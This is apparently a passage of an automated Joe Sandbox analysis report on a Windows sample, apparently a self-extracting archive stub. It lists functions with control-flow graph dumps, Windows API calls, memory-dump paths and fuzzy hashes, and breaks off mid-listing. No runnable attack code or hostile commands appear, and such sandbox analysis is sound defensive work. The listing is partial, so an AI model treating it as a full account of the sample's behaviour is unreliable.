    control_flow_graph 725 cbbb0b-cbbb24 726 cbbb3a-cbbb3f 725->726 727 cbbb26-cbbb36 call cc00fc 725->727 729 cbbb4c-cbbb70 MultiByteToWideChar 726->729 730 cbbb41-cbbb49 726->730 727->726 734 cbbb38 727->734 732 cbbd03-cbbd16 call cb0d6c 729->732 733 cbbb76-cbbb82 729->733 730->729 735 cbbbd6 733->735 736 cbbb84-cbbb95 733->736 734->726 738 cbbbd8-cbbbda 735->738 739 cbbb97-cbbba6 call cc31c0 736->739 740 cbbbb4-cbbbc5 call cba7ee 736->740 743 cbbcf8 738->743 744 cbbbe0-cbbbf3 MultiByteToWideChar 738->744 739->743 750 cbbbac-cbbbb2 739->750 740->743 751 cbbbcb 740->751 748 cbbcfa-cbbd01 call cbbd73 743->748 744->743 747 cbbbf9-cbbc0b call cbc11c 744->747 755 cbbc10-cbbc14 747->755 748->732 754 cbbbd1-cbbbd4 750->754 751->754 754->738 755->743 757 cbbc1a-cbbc21 755->757 758 cbbc5b-cbbc67 757->758 759 cbbc23-cbbc28 757->759 760 cbbc69-cbbc7a 758->760 761 cbbcb3 758->761 759->748 762 cbbc2e-cbbc30 759->762 763 cbbc7c-cbbc8b call cc31c0 760->763 764 cbbc95-cbbca6 call cba7ee 760->764 765 cbbcb5-cbbcb7 761->765 762->743 766 cbbc36-cbbc50 call cbc11c 762->766 768 cbbcf1-cbbcf7 call cbbd73 763->768 780 cbbc8d-cbbc93 763->780 764->768 781 cbbca8 764->781 767 cbbcb9-cbbcd2 call cbc11c 765->767 765->768 766->748 778 cbbc56 766->778 767->768 782 cbbcd4-cbbcdb 767->782 768->743 778->743 783 cbbcae-cbbcb1 780->783 781->783 784 cbbcdd-cbbcde 782->784 785 cbbd17-cbbd1d 782->785 783->765 786 cbbcdf-cbbcef WideCharToMultiByte 784->786 785->786 786->768 787 cbbd1f-cbbd26 call cbbd73 786->787 787->748
    APIs
    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CB6993,00CB6993,?,?,?,00CBBD5C,00000001,00000001,62E85006), ref: 00CBBB65
    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CBBD5C,00000001,00000001,62E85006,?,?,?), ref: 00CBBBEB
    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CBBCE5
    • __freea.LIBCMT ref: 00CBBCF2
      • Part of subcall function 00CBA7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CBDBDC,00000000,?,00CB80A1,?,00000008,?,00CBA861,?,?,?), ref: 00CBA820
    • __freea.LIBCMT ref: 00CBBCFB
    • __freea.LIBCMT ref: 00CBBD20
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ByteCharMultiWide__freea$AllocateHeap
    • String ID:
    • API String ID: 1414292761-0
    • Opcode ID: f84aead7d56dbe716f39b194cd65ba6f6979eb935b9f2721926e002167b66887
    • Instruction ID: 92d79fdad70c7bcd43712610ea906a6dee8a4da13df6976fe57ce77cf420503f
    • Opcode Fuzzy Hash: f84aead7d56dbe716f39b194cd65ba6f6979eb935b9f2721926e002167b66887
    • Instruction Fuzzy Hash: 9B51FF72600216ABDF258F65CC82FEF7BA9EB44750F254268FC24E6140EBB4DD44D690
    Function 00C9AB40 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 790 c9ab40-c9ab61 call caffc0 793 c9ab6c 790->793 794 c9ab63-c9ab66 790->794 796 c9ab6e-c9ab7f 793->796 794->793 795 c9ab68-c9ab6a 794->795 795->796 797 c9ab81 796->797 798 c9ab87-c9ab91 796->798 797->798 799 c9ab93 798->799 800 c9ab96-c9aba3 call c979e5 798->800 799->800 803 c9abab-c9abca CreateFileW 800->803 804 c9aba5 800->804 805 c9ac1b-c9ac1f 803->805 806 c9abcc-c9abee GetLastError call c9cf32 803->806 804->803 807 c9ac23-c9ac26 805->807 810 c9ac28-c9ac2d 806->810 815 c9abf0-c9ac13 CreateFileW GetLastError 806->815 809 c9ac39-c9ac3e 807->809 807->810 813 c9ac5f-c9ac70 809->813 814 c9ac40-c9ac43 809->814 810->809 812 c9ac2f 810->812 812->809 818 c9ac8e-c9ac99 813->818 819 c9ac72-c9ac8a call ca1928 813->819 814->813 817 c9ac45-c9ac59 SetFileTime 814->817 815->807 816 c9ac15-c9ac19 815->816 816->807 817->813 819->818
    APIs
    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00C98243,?,00000005,?,00000011), ref: 00C9ABBF
    • GetLastError.KERNEL32(?,?,00C98243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C9ABCC
    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00C98243,?,00000005,?), ref: 00C9AC02
    • GetLastError.KERNEL32(?,?,00C98243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C9AC0A
    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00C98243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C9AC59
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: File$CreateErrorLast$Time
    • String ID:
    • API String ID: 1999340476-0
    • Opcode ID: b6d875666ef2f874278cddcfda12748bcd68d4bbfa2e651c667b5b68e07bcd01
    • Instruction ID: 91f5f0aed87bdf6d9b16b4016f7c040e0c22a65466cf271225495943ab3ea992
    • Opcode Fuzzy Hash: b6d875666ef2f874278cddcfda12748bcd68d4bbfa2e651c667b5b68e07bcd01
    • Instruction Fuzzy Hash: CF314C305447856FEB309F24DC49BDABBD4BB05324F100B19F9B1961D1C7B2A945CBD6
    Function 00CA2206 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
    Download Yara Rule

    Control-flow Graph

    APIs
      • Part of subcall function 00CA24DF: ResetEvent.KERNEL32(?), ref: 00CA24F1
      • Part of subcall function 00CA24DF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CA2505
    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CA223A
    • CloseHandle.KERNEL32(?,?), ref: 00CA2254
    • DeleteCriticalSection.KERNEL32(?), ref: 00CA226D
    • CloseHandle.KERNEL32(?), ref: 00CA2279
    • CloseHandle.KERNEL32(?), ref: 00CA2285
      • Part of subcall function 00CA22FC: WaitForSingleObject.KERNEL32(?,000000FF,00CA2516,?), ref: 00CA2302
      • Part of subcall function 00CA22FC: GetLastError.KERNEL32(?), ref: 00CA230E
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
    • String ID:
    • API String ID: 1868215902-0
    • Opcode ID: 3ec4c94e7ee0524317ba8226bbdbb004c36df162dec0012252a090dbbc8c6348
    • Instruction ID: c60eff90d9d66271d360050823bc8d9e92c74296d85f37bb176e511b707678d6
    • Opcode Fuzzy Hash: 3ec4c94e7ee0524317ba8226bbdbb004c36df162dec0012252a090dbbc8c6348
    • Instruction Fuzzy Hash: 53018472440745EFC7269F68DD85FCABBAAFB08710F004929F26B92160CB757A54DB90
    Function 00CAC748 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 857 cac748-cac761 PeekMessageW 858 cac79c-cac79e 857->858 859 cac763-cac777 KiUserCallbackDispatcher 857->859 860 cac788-cac796 TranslateMessage DispatchMessageW 859->860 861 cac779-cac786 IsDialogMessageW 859->861 860->858 861->858 861->860
    APIs
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CAC759
    • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00CAC76A
    • IsDialogMessageW.USER32(000103D6,?), ref: 00CAC77E
    • TranslateMessage.USER32(?), ref: 00CAC78C
    • DispatchMessageW.USER32(?), ref: 00CAC796
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherPeekTranslateUser
    • String ID:
    • API String ID: 3531142305-0
    • Opcode ID: 2be5538ce50912cc75f4aa2218f9608e906c04dccd4ce1dd3d3e657dfba73df8
    • Instruction ID: b6aa16f9b2a7379af1bc2b92b1aca6e196e38c2e2721811737b9ed65f612ae35
    • Opcode Fuzzy Hash: 2be5538ce50912cc75f4aa2218f9608e906c04dccd4ce1dd3d3e657dfba73df8
    • Instruction Fuzzy Hash: 4AF06D71A0161AAB8B20ABE59C4CFEF7FACEE057957404415B716D2050EB64D505CBF1
    Function 00CABBB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 862 cabbb0-cabbcf GetClassNameW 863 cabbd1-cabbe6 call ca3306 862->863 864 cabbf7-cabbf9 862->864 869 cabbe8-cabbf4 FindWindowExW 863->869 870 cabbf6 863->870 865 cabbfb-cabbfe SHAutoComplete 864->865 866 cabc04-cabc06 864->866 865->866 869->870 870->864
    APIs
    • GetClassNameW.USER32(?,?,00000050), ref: 00CABBC7
    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CABBFE
      • Part of subcall function 00CA3306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,00C9D523,00000000,.exe,?,?,00000800,?,?,?,00CA9E4C), ref: 00CA331C
    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CABBEE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AutoClassCompareCompleteFindNameStringWindow
    • String ID: EDIT
    • API String ID: 4243998846-3080729518
    • Opcode ID: f08e80fb5e567e239f66ed0067fdd7f5a0db7fc791dbf985f711a063b93463b7
    • Instruction ID: 468459babd913af71d8f48565ac832ea472bdaa0a2eb468c80d0b5bb223fb873
    • Opcode Fuzzy Hash: f08e80fb5e567e239f66ed0067fdd7f5a0db7fc791dbf985f711a063b93463b7
    • Instruction Fuzzy Hash: 5AF0A7326017297BDB3056269C09FAF766CAF47B54F440065FB00F6185DB64EE01C6F6
    Function 00CABD0B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
      • Part of subcall function 00CA1B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CA1B4F
      • Part of subcall function 00CA1B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00CA0633,Crypt32.dll,00000000,00CA06AD,00000200,?,00CA0690,00000000,00000000,?), ref: 00CA1B71
    • OleInitialize.OLE32(00000000), ref: 00CABD24
    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CABD5B
    • SHGetMalloc.SHELL32(00CDA460), ref: 00CABD65
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
    • String ID: riched20.dll
    • API String ID: 3498096277-3360196438
    • Opcode ID: 73f7c5cc6b51ed9a12271b6a5a1c81ea05c01fccc1b8c5e391aa16a2527cb187
    • Instruction ID: 5bd1331e46dcdd58b3ab8c8c613543af6534f131bb37e3377673eaaa303ea8a2
    • Opcode Fuzzy Hash: 73f7c5cc6b51ed9a12271b6a5a1c81ea05c01fccc1b8c5e391aa16a2527cb187
    • Instruction Fuzzy Hash: 86F01DB5D00209ABCB10AF99D849EEFFFFCEF85705F00406AEA11E2250DBB45645CBA1
    Function 00CAED1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 875 caed1e-caed49 call caffc0 SetEnvironmentVariableW call ca1697 879 caed4e-caed52 875->879 880 caed76-caed78 879->880 881 caed54-caed58 879->881 882 caed61-caed68 call ca17b3 881->882 885 caed5a-caed60 882->885 886 caed6a-caed70 SetEnvironmentVariableW 882->886 885->882 886->880
    APIs
    • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00CAED34
    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CAED70
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: EnvironmentVariable
    • String ID: sfxcmd$sfxpar
    • API String ID: 1431749950-3493335439
    • Opcode ID: ea116d087645666329c81b9719386bc16d12fc6e65ec3880a1a852705ba466ca
    • Instruction ID: 43f281ad78fce923363cc888eb59fbf1be32f4f6af69bbbd2f15a3cafa31dc23
    • Opcode Fuzzy Hash: ea116d087645666329c81b9719386bc16d12fc6e65ec3880a1a852705ba466ca
    • Instruction Fuzzy Hash: C6F03072804236AADB212BD1CC05FEE7B98EF17B8AB084065FD85A6052E660C980D6F0
    Function 00CB4D92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 887 cb4d92-cb4da7 LoadLibraryExW 888 cb4ddb-cb4ddc 887->888 889 cb4da9-cb4db2 GetLastError 887->889 890 cb4dd9 889->890 891 cb4db4-cb4dc8 call cb7458 889->891 890->888 891->890 894 cb4dca-cb4dd8 LoadLibraryExW 891->894
    APIs
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CB4D43,00000000,?,00CF40C4,?,?,?,00CB4EE6,00000004,InitializeCriticalSectionEx,00CC7424,InitializeCriticalSectionEx), ref: 00CB4D9F
    • GetLastError.KERNEL32(?,00CB4D43,00000000,?,00CF40C4,?,?,?,00CB4EE6,00000004,InitializeCriticalSectionEx,00CC7424,InitializeCriticalSectionEx,00000000,?,00CB4C9D), ref: 00CB4DA9
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00CB4DD1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID: api-ms-
    • API String ID: 3177248105-2084034818
    • Opcode ID: 73fa7072b0bfc0354f43e93aea094b7b3dddbba41ea9401903aa3af5d79dc28d
    • Instruction ID: 7b5cf94825bef1123c1880faa568efc6c8ec72bd3b91d62081a0207037d47d3c
    • Opcode Fuzzy Hash: 73fa7072b0bfc0354f43e93aea094b7b3dddbba41ea9401903aa3af5d79dc28d
    • Instruction Fuzzy Hash: 3BE04F34688208B7EF141F71EC06F9D3FA8EB10B52F144120FD1DA84F1DB629A619984
    Function 00C9A9E5 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 895 c9a9e5-c9a9f1 896 c9a9fe-c9aa15 ReadFile 895->896 897 c9a9f3-c9a9fb GetStdHandle 895->897 898 c9aa71 896->898 899 c9aa17-c9aa20 call c9ab1c 896->899 897->896 900 c9aa74-c9aa77 898->900 903 c9aa39-c9aa3d 899->903 904 c9aa22-c9aa2a 899->904 906 c9aa3f-c9aa48 GetLastError 903->906 907 c9aa4e-c9aa52 903->907 904->903 905 c9aa2c 904->905 908 c9aa2d-c9aa37 call c9a9e5 905->908 906->907 909 c9aa4a-c9aa4c 906->909 910 c9aa6c-c9aa6f 907->910 911 c9aa54-c9aa5c 907->911 908->900 909->900 910->900 911->910 913 c9aa5e-c9aa67 GetLastError 911->913 913->910 915 c9aa69-c9aa6a 913->915 915->908
    APIs
    • GetStdHandle.KERNEL32(000000F6), ref: 00C9A9F5
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00C9AA0D
    • GetLastError.KERNEL32 ref: 00C9AA3F
    • GetLastError.KERNEL32 ref: 00C9AA5E
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorLast$FileHandleRead
    • String ID:
    • API String ID: 2244327787-0
    • Opcode ID: f451cacd301060726cb90740ec441f0eb6331c90b77cac31ee7ba858d677e16a
    • Instruction ID: 8885c0db7dd6f7305f718fe407c96f8215be0ec99b093f9e794e992fc1a521be
    • Opcode Fuzzy Hash: f451cacd301060726cb90740ec441f0eb6331c90b77cac31ee7ba858d677e16a
    • Instruction Fuzzy Hash: 92117C31940204EBCF209F61DA08B6E37A9FB05765F10862AF926851A0DF758F44EFD3
    Function 00CBBEE4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00C9EA30,00000000,00000000,?,00CBBE8B,00C9EA30,00000000,00000000,00000000,?,00CBC088,00000006,FlsSetValue), ref: 00CBBF16
    • GetLastError.KERNEL32(?,00CBBE8B,00C9EA30,00000000,00000000,00000000,?,00CBC088,00000006,FlsSetValue,00CC8A00,FlsSetValue,00000000,00000364,?,00CBA5D7), ref: 00CBBF22
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CBBE8B,00C9EA30,00000000,00000000,00000000,?,00CBC088,00000006,FlsSetValue,00CC8A00,FlsSetValue,00000000), ref: 00CBBF30
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID:
    • API String ID: 3177248105-0
    • Opcode ID: a92ccfe73f6b2dc1917db76fe79786ad3b08b1a43bec7acd3b1c5be24d1b16c1
    • Instruction ID: 92508c5d4d08173bbe2484d6717c95a3f2362da4f498be997f88fdf2bb9fd9fd
    • Opcode Fuzzy Hash: a92ccfe73f6b2dc1917db76fe79786ad3b08b1a43bec7acd3b1c5be24d1b16c1
    • Instruction Fuzzy Hash: C601F73A3552229BC7258BA9EC54FBB7798EF057A2B114620F92AD3140CBA0DD01CAE0
    Function 00C9B20A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
    Download Yara Rule
    APIs
    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00C9E79B,00000001,?,?,?,00000000,00CA66B2,?,?,?), ref: 00C9B22E
    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00CA66B2,?,?,?,?,?,00CA6174,?), ref: 00C9B275
    • WriteFile.KERNEL32(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00C9E79B,00000001,?,?), ref: 00C9B2A1
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: FileWrite$Handle
    • String ID:
    • API String ID: 4209713984-0
    • Opcode ID: 8a509e20e9d2f515208ecc22832d7370bf669d7dacba5f76e2d2ce81c4531cdc
    • Instruction ID: 3a77ea6d7f77a48347bbe8e575c500c3e9b494d6d6e8959851a90a43c0a6475a
    • Opcode Fuzzy Hash: 8a509e20e9d2f515208ecc22832d7370bf669d7dacba5f76e2d2ce81c4531cdc
    • Instruction Fuzzy Hash: 2831AB71248306AFDF08CF10EA18BAE77A5FB81715F00461DF99167690CB74AE48CBA2
    Function 00C9B542 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
    Download Yara Rule
    APIs
